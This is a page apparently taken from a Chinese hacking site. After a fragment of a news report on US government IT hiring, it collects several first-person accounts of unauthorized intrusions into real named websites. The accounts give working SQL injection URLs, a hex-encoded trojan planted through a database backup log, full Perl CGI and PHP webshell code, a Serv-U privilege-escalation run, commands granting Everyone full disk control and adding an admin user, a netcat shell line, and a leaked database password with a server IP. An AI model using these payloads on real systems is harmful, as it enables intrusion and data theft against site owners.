政府部门之间在聘请人员的问题上也意见分歧。调查显示,在18个政府内外机构中产生的重重问题,大大阻碍了政府寻找人才填补空缺,更无法成立一个顶尖的电脑专才团。

报告建议联邦政府,必须大刀阔斧进行改革,设法改善政府在招聘、管理和栽培电脑人员问题上的制度。报告也提到,政府应该积极支持和鼓励在职的数理科学生联系,这将增加政府日后的电脑专才人选。

相关文章

• 2010年12月3日 -- 公安部专项行动破180起黑客攻击案 460余人落网
• 2010年04月3日 -- 网游厂商运营失败的两大直接原因：私服和黑客
• 2010年03月30日 -- 网络黑客团伙犯罪组织内部10大职务探秘
• 2010年03月23日 -- 百度的招聘再一次证明黑客招聘是不需要学历的
• 2009年12月29日 -- 资深黑客揭秘IDC行业内幕
• 2009年08月27日 -- 国外肉鸡行情和黑客收入一览
• 2009年08月27日 -- 互联网老兵谈中国黑客史：放弃理想而追逐短利
• 2009年08月4日 -- 布什政府曾计划网络攻击萨达姆
• 2009年08月3日 -- Big List Of Hacking Tools 2009 北美2009年黑客软件工具箱
• 2009年07月24日 -- 央视曝3305万案黑客照片 疑犯福彩机房操作

相关文章

• 2009年07月24日 -- 报告称美政府缺乏电脑专才 受黑客入侵束手无策
• 2008年10月14日 -- Mop游戏的一次入侵
• 2007年06月24日 -- 入侵联想网御全过程
• 2007年01月7日 -- 入侵BT服务器
• 2006年11月9日 -- 入侵闪客帝国Flashempire

某天，我和bloodsword大牛在玩，遇到了个mop注射点，起于好奇心的诱惑，溜达之，发现遇到了很多的困难。谁知今天又看到了那个站，于是乎就想写写什么，因为上次遇到的问题真的太多了，写啊写不完。最近五一放假，相对来说有点时间，于是想抄起武器再溜达次，顺便把过程给写写。
首先是一个游戏的站。隶属于mop的，是大话西游的官方地址。上面有许多的下载文件。
如图1

注入点为：http://www.zg.mop.com/service/sales.php?newsId=1178，于是开始注射，我比较喜欢手动的，因为我喜欢看到那个熟悉的MD5页面，于是开始手动注射，
判断长度：http://www.zg.mop.com/service/sales.php?newsId=1178 order by 25/*，
发现返回错误，http://www.zg.mop.com/service/sales.php?newsId=1178 order by 24/*返回正常，那么就是24个长度了，
http://www.zg.mop.com/service/sales.php?newsId=1178 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
发现返回如图

于是开始把“12”、“13”2出用列来代替，随便想了个admin表，想了个userid，构造http://www.zg.mop.com/service/sales.php?newsId=1178 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,userid,14,15,16,17,18,19,20,21,22,23,24 from admin/*
结果返回如图

最后猜到了一些信息，发现权限不是root的，也就是一个一般的账号，看来load_file这个路已经没戏了，换路。继续构造：
http://www.zg.mop.com/service/sa ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,pwd,userid,14,15,16,17,18,19,20,21,22,23,24%20from%20admin/*爆出了个MD5，发现这个MD5无法破解，真郁闷，难道就这么死了？！不行！继续找管理级的账号，
于是用limit，构造语句http://www.zg.mop.com/service/sa ... 0union%20select%201,2,3,4,5,6,7,8,9,10,11,pwd,userid,14,15,16,17,18,19,20,21,22,23,24%20from%20admin limit1,1，读出第2条记录，

于是跑出了账号密码，32位加密的MD5，接着开始找后台，郁闷的是，找后台并不是想的那么简单的！啊D，明小子什么的扫了很久也没扫出什么花样，最后还是bloodsword大牛的注射工具比较强大，字典真厚，扫出了个setup目录，登录一看，吓到我了，原来是织梦的系统……这下，嘿嘿，后台等于拿到手了。如图

就是喜欢看到“Power by DedeCms 织梦内容管理系统”这几个字，于是去down了份织梦的系统，顺利的找到了后台地址，并且登陆，如图

相关文章

• 2009年07月24日 -- 报告称美政府缺乏电脑专才 受黑客入侵束手无策
• 2009年06月25日 -- [转]年终了，谈点个人入侵的经验
• 2007年06月24日 -- 入侵联想网御全过程
• 2007年01月7日 -- 入侵BT服务器
• 2006年11月9日 -- 入侵闪客帝国Flashempire

我曾经在多个政府部门看到他们的防火墙.感觉他挺牛的，可是，事实上，这个所谓的安全公司真的有那么牛吗？正好赶上周末不用上班，对他们的web系统进行了一下测试，结果.....

http://www.infosec365.com.cn/00001/000010006/0000100060002/000010006000200
02/test.txt


好了，废话不多说了。拿起工具，开始我们的入侵吧。

入侵之前我要说一下，对方是安全公司，指不定会给你放个防火墙IDS蜜罐什么的东西。不小心踩中蜜罐或者被IDS记录到，你们可别怪我。
我先看了一下联想的程序，还不错asp.net的。呵呵，不过漏洞没补上，随便点了一个连接。

http://www.infosec365.com.cn/00001/000010006/0000100060002/000010006000200
02/default.aspx?page=1


后边跟了一~号，发现

爆路径了吧。当时我就想，既然我都知道网站路径了，要是有注入而我们的权限又够的话，嘿嘿……

然后我就开始着手寻找注入点。因为我这边的系统有毛病，跑不起啊，那我只好手动找了，找得好辛苦。

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29


找到了这个，自己拿工具跑下就知道是不是注入了。我拿起了NBSI，发现权限是DB_OWNER的，不支持多句。按照小稀当初跟我说的，不支持多句的注入点是不能进行LOG的。没办法，我实在是找不到别的漏洞了，只好试一下了。
看到?是成功备份了，但是没有成功的插入一句话。起先我还以为是不支持多句的缘故，后来看到深白在线，跟他聊了一下，他说DB_OWNER够用了。这句话是我动力的源泉啊，然后发了注入点给他，我们琢磨了好一阵子。通过看联想的错误返回报告才知道，原来是联想过滤了execute 怪不得了，最后我们手动LOG了一个eval端上去。

http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image])--


http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name
(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c0030
0030003000300031005c003000300030003000310030003000300036005c003000300030003000310030003000
3000360030003000300032005c0030003000300030003100300030003000360030003000300032003000300030
0032005c0031002e00610073007000/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/
init,no_truncate--


http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;insert/**/into/**/
[shit_tmp](cmd)/**/values
(0x3c0025006500760061006c00200072006500710075006500730074002800220023002200290025003e00)--


http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-
29’;declare/**/@a/**/sysname,@s/**/nvarchar(4000)/**/select/**/@a=db_name
(),@s=0x44003a005c006c007800770079005c004e00650077005c0077006500620073006900740065005c0030
0030003000300031005c003000300030003000310030003000300036005c003000300030003000310030003000
3000360030003000300032005c0030003000300030003100300030003000360030003000300032003000300030
0032005c0031002e006100730070005C007A007A002E00610073007000/**/backup/**/log/**/@a/**/to/**
/disk=@s/**/with/**/init,no_truncate--


http://www.infosec365.com.cn/ViewEbook.aspx?ebookdate=2005-11-29’;Drop/**/table/**/
[shit_tmp]--


其中第3部中的values()括号里边的为1句话木马的16进制.大家可以自己转化自己的一句话放里边，这5步下来我们就成功拿到webshell了。因为我是在公司上的，为了不连累公司，我就不做下一步入侵了，给管理员发个信提示一下就可以了。

相关文章

• 2009年07月24日 -- 报告称美政府缺乏电脑专才 受黑客入侵束手无策
• 2009年06月25日 -- [转]年终了，谈点个人入侵的经验
• 2008年10月14日 -- Mop游戏的一次入侵
• 2007年01月7日 -- 入侵BT服务器
• 2006年11月9日 -- 入侵闪客帝国Flashempire

值得一看哦......

以前入侵少之又少，都是研究这样研究那样，实战经验太欠缺了，所以决定暑假恶补一下渗透技术，顺便又可以看看国内主机的安全性。暑假 6 月整整学习了一个月的渗透，从 xiaolu 身上学习到不少好的思路和经验。在此谢谢xiaolu 了。

一个多月的时间里，渗透过上百台服务器，有独立的，有虚拟主机的，有群组的，有国内和国外，我发现一个极其严重的问题，国外的服务器，普遍安全性都非常高，管理员的安全意识非常高，做个比例，如果国内平均每 10 台服务器，能渗透进去 6 台甚至更多，那国外、台湾的，平均每 10 台服务器仅仅能渗透 1 台。当然我的水平也是一个问题。可是却反映出国内的管理员的水平的的确确比国外的要差几个档次。国内的管理员的技术和意识，迫切需要大幅度提高。

不过国内的也有比较 BT 的管理员，我就遇见几个服务器设置得非常。其中一个的 Documents and Settings 目录下还有 nsfocus 目录，难道是 nsfocus 公司帮做的安全？这个服务器我们没有拿下，还有另外一个，就是今天的重点。

一次看见了一个学校论坛（http://www.*****.com），还蛮火爆的，顿时兴趣来了， ping 了一下，发现 4 个包都返回 Request timed out. 估计是搞了策略或者防火墙的，象我这种以 Web 安全的，自然喜欢从站点上找漏洞，自从学习 Web 开始，我就落下一个怪癖，就是如果实在从 Web 上找不到什么漏洞，宁愿放弃也不用什么漏洞扫描器。

大概看了看站点。就是一个论坛，采用 LeadBBS ，拿这个论坛没辙，还有其他办法，因为刚才我访问这个 IP ，返回“No web site is configured at this address.”，初步判断是虚拟主机，前段时间那几个黑站狂黑站的成功几率为什么这么高？因为有 http://whois.webhosting.info 这个网站，可以查询一个 IP 上，绑定了多少个域名。如果真的是虚拟主机，这个学校论坛没有漏洞，不代表其他站点就没有，很快的，我就通过一个小公司站点（ http://anyhost/ ）上的 DVBBS 6.0 传了一个 aspshell 上去，谁知道仅仅能够对自己的目录进行操作。而且自己的目录没有执行程序的权限，又用不了 Nfso ，手工跳转 URL 中的目录，也没有多少个可以浏览的，重要的 Program Files 和 Documents and Settings 目录都看不了，从 aspshell 反馈的信息来看，每个站点都设置了单独的用户，似乎一切都陷入僵局。

没有目的的跳转目录着……

我习惯性的在 URL 跳转到 c:\php，没想到居然可以看见了，那这个主机很可能就会支持 php 了，马上传了一个 phpspy 上去，非常幸运，顺利看到了登陆入口，可是没想到进入以后才发现，php.ini 亦设置得异常 BT，安全模式打开了， phpinfo 函数也被禁用了，看不了详细的系统信息，不过看 phpspy 自带的探针可以发现，allow_url_fopen、display_errors、 register_globals 统统关闭，system、passthru、exec、shell_exec 几个函数都无一幸免的被禁用了，直接跳转目录还是只可以看到这些目录而已，各个站点的目录都是类似于 “D:\websites\school.com#dlfjurdlkfjk” 这样的，每个站点目录后面的那些字符串都不一样，也跳转不到，后来我猜测后面的字符串就是 ftp 密码，试验了一下，无法登陆，看似柳暗花明，希望又破灭了……

结束了吗？不，我试着 FTP 一下：

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

C:\Documents and Settings\Administrator>ftp www.*****.com

Connected to www. school.com.

220 Welcome to FTP Server...

User (www.bjtrq.com:(none)):

331 User name okay, need password.

Password:

530 Not logged in.

Login failed.

ftp> bye

221 Goodbye!

从返回的信息判断，我们还是有希望的。尽管他修改了 FTP Server 的 Banner，但是从 User name okay, need password. 这句我们还是大胆的判断这个服务器就是采用 Serv-U ，我上手有目前所有版本 Serv-U 本地提升权限的 Exploit ，如果我能传一个上去，并且能够执行，一切就明朗了。再仔细想想有哪个目录可以写的？当时在 c:\php 目录下没有发现 sessiondata 目录，而且也不是自动安装版，估计管理员把 session 的目录换到其他地方了，不然这个目录是 everyone 可写的……

原来我还忘记了一个最重要的目录， C:\Documents and Settings\All Users ，从这个目录可以知道很多信息，这个目录一般、至少都是 everyone 可读的，这样我们就可以知道好多有用的信息了，直接通过我的 aspshell 手工跳转到这个目录，呵呵。马上看到了想看的目录树。

Application Data

Documents

DRM

Favorites

Templates

「开始」菜单

桌面

马上试试建目录，可惜里面的目录包括子目录都无法新建， BT 管理员权限设置得还真严格，不过我们还是有收获的，那就是 “C:\Documents and Settings\All Users\ 「开始」菜单 \ 程序 \”目录里，看到了很多决定结果的有用信息，

ActiveState ActivePerl 5.8

Administrative Tools

Deerfield.com

DTemp

IPSentry

MBM 5

NetMeter

Network ICE

Persits Software AspEmail

Persits Software AspJpeg

Serv-U FTP Server

Symantec Client Security

Windows 优化大师

WinRAR

启动

管理工具

附件

呵呵，现在我们知道了好多有用的信息了，看着这些东西，可以看得出管理员对安全、效率很在意，装了 Perl，也就是说可能支持 cgi 了， IPSentry 这个可以实时检测网站的各类服务, 当某服务停止时, 该软件会打 Pager, 或 EMAIL,或发声,或运行其它软件来提醒管理员，确保服务器出现问题能及时处理，说明管理员比较负责任，NetMeter 可以对网络流量进行监控，装了黑冰防火墙和诺顿杀毒服务器版，说明管理员对于服务器的安全是很小心的，这还不算，还装了另外一个防火墙—— VisNetic Firewall，真是 BT 到家了，装了优化大师，看得出这个管理员还是比较爱清洁的。从管理工具里面我们还看到了终端服务客户端生成器.lnk 、终端服务配置.lnk ，还有终端服务，这下好了，说不定顺利就可以多一台 3389 肉鸡了。

先通过 aspshell 下载 Serv-U 的任意一个快捷方式，然后本地查看属性的目标，呵呵，原来 Serv-U 的目录是 "C:\Program Filesewfq4qrqtgy4635\Serv-U\" ，这下好了，直接跳转目录。OH～，yes～～，看到了，马上修改 ServUDaemon.ini文件，这个服务器居然放了 280 个用户，狂晕……不管了，先在添加 [Domain1] 里加一行：

User281=angel|1|0

然后加上

[USER=angel|1]

Password=ng98F85379EA68DBF97BAADCA99B69B805

HomeDir=D:\websites

RelPaths=1

TimeOut=600

Maintenance=System

Access1=D:\websites|RWAMELCDP

SKEYValues=

添加一个 angel，密码为 111111 的用户，具有最高权限执行，然后我们就可以 ftp 上去 quote site exec xxxxxxxx 了，嘻嘻偷笑中……

不过残酷现实再一次粉碎了我的计划，修改好文件以后提交，居然是没有修改成功，看来还是权限，权限权限整惨人啊。

不过还是有希望的，因为刚才我们看到了系统装了黑冰，有些版本存在“ISS RealSecure/BlackICE 协议分析模块 SMB 解析堆溢出漏洞”，可以远程利用的，手头上没
有编译器，没有办法编译代码。

还有就是 Perl，这个是个很大的突破口，因为 Perl 目录一般要 erveryone 完全控制的，不管他用 isap 还是 perl.exe 一般都是可写、可执行的，马上下载 Perl 的快捷方式来看看路径，呵呵，看到了，原来 D:\user\bin 就是存放 perl 的 bin 目录下的所有文件，这么说这个目录可能可以写，也可能可以执行咯，马上传一个 su.exe（针对目前所有版本的 Serv-U 本地提升权限漏洞）上去，呵呵，传上去了，太好了，现在就是执行了，刚才我们试了 aspshell、phpshell 都不行，现在就看最后的希望了，找呀找啊，终于在我硬盘上找到一个 cgishell，很老了，文件日期是 2002 年 6 月 30 日的，代码如下：

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "

\r\n", 13); open(STDERR, ">&STDOUT") || die "Can’t redirect STDERR"; system($execthis); syswrite(STDOUT, "\r\n

\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

我用过最好的 cgishell ，保存为一个 cgi 文件执行，晕……居然不支持！一阵阵郁闷袭来，2 秒钟的郁闷后，想到还有一线希望，那就是pl ，我们还没有试试 pl 扩展呢，把刚才的 cgi 文件改为 pl 文件，提交 http://anyhost//cmd.pl?dir ，我的天啊！！

显示“拒绝访问”，终于可以执行了！太兴奋了，马上提交：

http://anyhost//cmd.pl?d:\user\bin\su.exe

返回：

Serv-u >3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

嘻嘻～～现在是 IUSR 权限，那又怎么样？看你这次还不死？提交：

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

http://anyhost//cmd.pl?d:\user\bin\su.exe "cacls.ex ... T /G everyone:F"

返回下面的信息，就表示成功了！！！

Serv-u >3.x Local Exploit by xiaolu

<220 Serv-U FTP Server v5.2 for WinSock ready...

>USER LocalAdministrator

<331 User name okay, need password.

******************************************************

>PASS #l@$ak#.lk;0@P

<230 User logged in, proceed.

******************************************************

>SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

<200-DomainID=2

<220 Domain settings saved

******************************************************

[+] Domain xl:2 Created

[+] Creating Evil User

<200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

>USER xl

<331 User name okay, need password.

******************************************************

>PASS 111111

<230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

<220 Domain deleted

******************************************************

每提交完一次都稍微等一下，因为这些命令需要时间处理的，不一会儿，就把所有分区设置为 everyone 完全控制了，可以任意操作硬盘的东西了，但是有些命令还是受了限制，因为权限还没有提升，现在我们把自己的用户提升为管理员：

http://anyhost//cmd.pl?d:\user\bin\su.exe " net l ... s IUSR_anyhost /add"

现在我们通过 web 方式，执行的命令就是以 administrator 的身份执行的了，相信到这里，下面的事该做什么，大家应该知道了吧？马上找到那个学校的目录，进去咯～～目的达到了，本来还想做一个 3389 的肉鸡的，想想算了，这种 BT 管理员的地盘，我也占领不了多久，留点提示到他的桌面就 over 了。

说真的，搞安全这么久，从来没有遇见这么棘手的虚拟主机，要不是装了 Perl，还真是束手无策！本文技术含量不高，只是分享一下希望其中的思路，如果有一个人从中受益，这篇文章就完成它的使命了。

相关文章

• 2009年07月24日 -- 报告称美政府缺乏电脑专才 受黑客入侵束手无策
• 2009年06月25日 -- [转]年终了，谈点个人入侵的经验
• 2008年10月14日 -- Mop游戏的一次入侵
• 2007年06月24日 -- 入侵联想网御全过程
• 2006年11月9日 -- 入侵闪客帝国Flashempire

入侵步骤 One

首先扫描一下flashempire.com 主机,发现一些常用端口。MySql数据库支持远程连接,整理了一下入侵思路还是重我比较熟悉得 脚本注入 下手吧。首先我们要得到web目录得路径,怎么办呢？就让它出错吧 ^_^ ，当提交一个错误的Query，如果display_errors = on，程序就会暴露WEB目录的绝对路径，只要知道路径，那么对于一个可以注入的PHP程序来说，整个服务器的安全将受到严重的威胁。构造语句是小意思了。
http://www.flashempire.com/theater/top10.php?id=315 就已此为突破口
提交如下信息:
http://www.flashempire.com/theater/top10.php?id='
http://www.flashempire.com/theater/top10.php?id=

返回因为提交数据出错而爆出的路径，如图;

再次思考了下,自己对闪客帝国的网站系统结构一无所知。就将我们的目标定位在MySql数据库，所有当前首要任务是拿到config.php中的数据库帐号 and 密码。由于闪客帝国的主站系统是自己开发的,我们无重得知其文件列表与数据结果。这里我们考虑直接读取文件,就是load_file()，该函数的作用是读入文件，并将文件内容作为一个字符串返回。
当然其也有很多的限制:[php手册中的解释]
1、 欲读取文件必须在服务器上
2、 必须指定文件完整的路径名
3、 必须有权限读取并且文件必须完全可读
4、 欲读取文件必须小于 max_allowed_packet
5、 如果该文件不存在，或因为上面的任一原因而不能被读出，查询返回 NULL

首先提交如下Query:

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file('/home/flash/www/theater/theater.php'),1 


返回出错信息
估计是magic_quotes_gpc = on ,过滤掉了 '号；换种方式再来一次，继续提交[char()函数]
[char()――将提交得字符转换为10进制，也可以使用SQL Encoder.exe转换为16进制得。已适应各种情况]
再次提交使用char()函数的Query:

"char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,116,104,101,97,116,101,114,47,116,111,112,49,48,46,112,104,112)" 


就是"/home/flash/www/theater/theater.php"的ASCII代码"

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file(char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,116,104,101,97,116,101,114,47,116,111,112,49,48,46,112,104,112)),1 


成功读出theater.php文件代码
返回成功读出theater.php文件的代码，如图;

根据经验以及文件命名, /include/dbconnect.php就是我们的目标---存放数据库的连接信息的文件。
提交新的Query:

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file(char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,105,110,99,108,117,100,101,47,100,98,99,111,110,110,101,99,116,46,112,104,112)),1 


成功读出/include/dbconnect.php文件代码
返回成功读出/include/dbconnect.php文件的代码，如下;
$conn = mysql_connect("localhost","root","flash945") or die("数据库连接失败！");

^_^,成功拿到MySql数据库帐号；密码。刚才我们扫描得知MySql允许远程连接;现在我们用PhpMyadmin登陆上看看[phpmyadmin管理mysql个人感觉更方便一些]

打开 本机得 phpmyadmin/config.inc.php 作如下修改

$cfg['Servers'][$i]['host'] = 'localhost' //localhost修改为61.156.17.126[闪客帝国服务器IP] 
$cfg['Servers'][$i]['user'] = 'root'//MySql登陆帐号,不必修改 
$cfg['Servers'][$i]['password'] = '';// MySql登陆密码,修改为flash945 


保存后,浏览我们本机得phpmyadmin即可以管理闪客帝国得MySql数据库.如图;

四处逛逛收集信息,发现很对该网站管理层得帐号密码。本想用社会工程学猜猜密码，单均已失败告终。天津来得朋友又打电话叫去吃火锅，本来想带MM一起去。怕回来太晚就算了。今天的入侵告一段落。

晚上回到寝室一晚上都没睡好，反正整晚都迷迷糊糊的在想如何拿到php shell以及 /etc/password/ 等东西。早上5点就自己醒了,还在回味昨天所想到的入侵思路――――利马跑到机房继续提升权限。

入侵步骤 Two
分析了昨天拿到的数据库
Mysql—MySql数据库的信息
mysql00—估计是MySql数据库备份信息
fe4—主站数据库信息
dhht—论坛信息
blog—管理员的日记信息
a4u—公司商业信息数据
……

思路 1:
首先想到的思路是利用MySQL导出Php Shell，就是利用到手的PhpMyadmin在里面一个数据表中插入Php Shell的内容，然后利用into outfile导出到相应目录，就有了一个后门。在fe4 - fe_faq表 id=16 的位置我们插入Php Shell 代码[angel的小型上传型后门].

<?php 
$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "上传成功" : "上传失败"; 

echo $msg; 
?> 
<form ENCTYPE="multipart/form-data" ACTION="<?=$PHP_SELF?>" METHOD="POST"> 
<input NAME="MyFile" TYPE="file"> 
<input VALUE="提交" TYPE="submit"> 
</form> 


有了Php Shell代码,下面我们开始into outfile。生成文件的前提是目标文件夹可写!于是我们找到

 
http://www.flashempire.com/school/uploader.php [上传FLASH的区域,对应文件夹应该是可写的]，读取/home/flash/www/school/upload_file.php 


http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,load_file(char(47,104,111,109,101,47,102,108,97,115,104,47,119,119,119,47,115,99,104,111,111,108,47,117,112,108,111,97,100,95,102,105,108,101,46,112,104,112)),1 


得到上传FLASH文件的文件夹目录为

$path = "/home/flash/www/download/fla2/"; 
//$path = "D:\\fe4\\upload\\"; 


下面浏览一下我们插入进fe_faq数据库中的Php Shell代码

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,a,1%20from%20fe_faq%20where%20id%20=16 


返回正常,如图:

开始将fe_faq数据库中的内容导出生成Php Shell

http://www.flashempire.com/theater/top10.ph ... 01=2%20union%20select%2050,8,7,6,5,4,3,a,1%20from%20fe_faq%20where%20id%20=16%20into%20outfile%20'/home/flash/www/download/fla2/safer.php' 


试了几次都不行，失败，继续想其他办法。
估计是已下原因:
into oufile一定要引号的,而magic_quotes_gpc = on,过滤掉了我们提交的引号。

思路 2:
由论坛入手上传Php Shell,浏览dhht – setting表,得到论坛得浏览地
址 http://61.156.17.126/dhht/
然后我们注册个帐号 safer/safer ;然后在PhpMyadmin中选择dhht – user数据库并执行" select * FROM `user` where username='safer';"把我得帐号usergroupid修改为6,这样我就成论坛管理员了。
登陆后台 http://61.156.17.126/dhht/admin/ 把论坛常规选项 －附件的有效扩展名 中添加php.然后找个人少的版面上传Php后门。结果又是失败――又到数据库中查看才知道此VBB 2.3.4没有修改过,全部附件数据都在 数据库 中Php后门当然不能执行。。。555 ：（

此时陷入深思中,给angel lanker 发短信。结果angel说跑来上网看看,lanker得陪人。然后又给MM发消息,说好一起吃晚饭。这时我也冷静了下,在等angel的同时继续看闪客帝国,突然发现刚才得数据库中怎么没有闪客帝国本身的论坛数据？！。浏览flashempire.net 闪客帝国论坛。Ping 了下后发现flashempire.com和flashempire.net 是2台服务器。
flashempire.com - - 202.115.129.17
flashempire.net - - 202.115.129.49
用刚才得MySql数据库帐号连接flashempire.net - - 202.115.129.495居然也进去了。又四处乱逛,对闪客帝国论坛flashempire.net也试着上传了下php后门,结果一样――又是失败！既然这里没什么问题，思路混乱中,和angel边聊天边清理思路。最后抱着试试看得心里发据下管理员的blog表,希望在里面发现密码的相关信息。在61.156.17.125-allanblog-AllowedTypes中却以外发现了我梦寐以求的东西！
AllowedTypes:jpg,jpeg,gif,mpg,mpeg,avi,mov,mp3,swf,png
很明显这个blog允许上传影音文件,那么文件夹当然是可写得,我们得PHP后门当然也能传上去。
访问61.156.17.125-allanblog-nucleus_member管理原得密码果然是MD5加密得。还有办法,很快我下载了个同样得BLOG程序并在我电脑上安装成功,设置管理帐号safer/111。

698d51a19d8a121ce581499d7b701668 safer
5dfb3282f16949956bb84731bd4a3884 allan

用PhpMyadmin替换一下顺利登陆,然后上传我们可爱的php shell。终于上传成功,感动哦。马上给lanker报喜 嘻嘻..

然后在服务器里到处逛逛,看看管理员的目录都有那么好东西；看看Apache Ftp的配置文件并下载/etc/passwd 看看。对Linux我不是很熟悉,就此不再继续深入。如果是NT的就可以考虑下抓包等,获取密码信息渗透入公司内网。约了MM吃饭可不能迟到，给闪客帝国得admin 发 gmail 去。哈哈打电话叫 MM 出来一起吃饭庆祝咯！

相关文章

• 2012年02月10日 -- Xpath SQL Injection
• 2011年06月6日 -- Easy Media Script SQL Injection Vulnerability
• 2011年05月12日 -- Joomla Component com_hello SQL Injection Vulnerability
• 2010年06月6日 -- Havij v1.1 Advanced SQL Injection
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(2)
• 2010年05月8日 -- PhpCms 2008 Sp3 Blind SQL Injection Exploit(1)
• 2010年04月14日 -- SFX-SQLi SQL2005/2008注入工具
• 2009年12月6日 -- SQL通用防注入程序 20091206版
• 2009年09月21日 -- MvMmall_V5.5.1 Blind SQL Injection Exploit
• 2009年09月4日 -- DVBBS php v2.0 boardrule.php注入漏洞